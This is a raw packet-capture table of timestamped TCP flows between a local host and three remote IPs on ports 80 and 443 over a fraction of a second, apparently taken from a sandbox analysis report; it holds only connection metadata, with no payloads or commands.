Aug 10, 2024 16:12:23.599123955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599131107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599139929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599153996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599175930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599847078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599863052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599873066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599884033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599890947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599900007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599906921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599915981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599929094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599935055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599942923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599961042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599976063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599988937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599998951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600008011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600018024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600027084 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600035906 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600044966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600054979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600060940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600073099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600078106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600087881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600092888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600100994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600107908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600116968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600136995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600136995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600148916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600824118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600835085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600843906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600853920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600868940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600873947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600893021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600899935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600908995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600912094 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.600915909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600925922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600935936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600941896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600953102 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.600954056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600965023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600975990 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.600975990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.600980043 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.600982904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.600991964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.601016998 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.601067066 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.601095915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.601522923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.601532936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.601599932 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.601787090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.601798058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.601803064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.601808071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.601814032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.601843119 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.601851940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602505922 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.602523088 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.602591038 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.602596998 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.602637053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602648973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602664948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602675915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602683067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602691889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602701902 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602706909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602716923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602722883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602734089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602741003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602751017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602756977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602766037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602773905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602786064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.602788925 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.602792025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602807999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602826118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.602896929 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.602910995 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.602986097 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.602991104 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.603214025 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.603637934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.603646994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.603679895 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.603698969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.603708982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.603714943 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.603718042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.603729010 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.603737116 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.603761911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.603787899 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.603787899 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.603792906 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.603876114 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.604311943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604322910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604331017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604341030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604350090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604362011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604367018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604377985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604392052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604397058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604404926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604422092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604429007 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604437113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604446888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604455948 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604464054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604470015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604479074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604490995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604499102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604516983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604540110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604549885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604559898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604571104 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604583025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604602098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604608059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604618073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.604636908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.604665041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.605340958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605345011 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.605351925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605357885 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.605360985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605365992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605370998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605376959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605381966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605387926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605396032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605397940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.605411053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605421066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605427980 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.605432034 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.605432034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.605437994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605447054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605459929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.605460882 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.605473042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605479956 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.605489969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.605492115 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.605608940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.636112928 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.636130095 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.636282921 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.636287928 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.636336088 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.653887987 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.653909922 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.653928041 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.653945923 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.653963089 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.653963089 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.654002905 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.654042006 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.654064894 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.655257940 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.655288935 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.655349970 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.655364990 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.655394077 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.655412912 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.667512894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667526960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667538881 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667592049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667706966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.667740107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667752981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667785883 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.667817116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667836905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667848110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667860031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.667898893 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.667898893 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.667995930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668006897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668016911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668138981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668149948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668159962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668170929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668181896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668200016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668200970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668200970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668200970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668247938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668248892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668395996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668406963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668416023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668426991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668437958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668448925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668459892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668472052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668483973 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668483973 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668497086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668530941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668664932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668677092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668685913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668697119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668709993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668720961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668739080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668739080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668767929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668932915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668943882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668953896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668967009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668977022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668988943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.668988943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.668999910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669009924 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669019938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669092894 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669092894 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669092894 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669305086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669316053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669325113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669336081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669346094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669358015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669370890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669485092 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669485092 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669486046 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669637918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669648886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669660091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669670105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669681072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669691086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669702053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669712067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669723988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669734001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669750929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.669756889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669756889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669756889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669756889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669768095 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.669822931 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670005083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670017004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670026064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670037031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670054913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670066118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670078039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670078993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670098066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670110941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670110941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670162916 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670283079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670423985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670434952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670444012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670456886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670459032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670459032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670468092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670479059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670490026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670500040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670509100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670509100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670510054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670521975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670588970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670588970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670856953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670869112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670878887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670888901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670903921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670916080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670936108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670945883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670948029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670948029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670957088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670965910 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.670968056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670979977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.670990944 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671000957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671004057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.671010971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671015024 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.671020985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671032906 CEST	80	49740	147.45.44.104	192.168.2.4
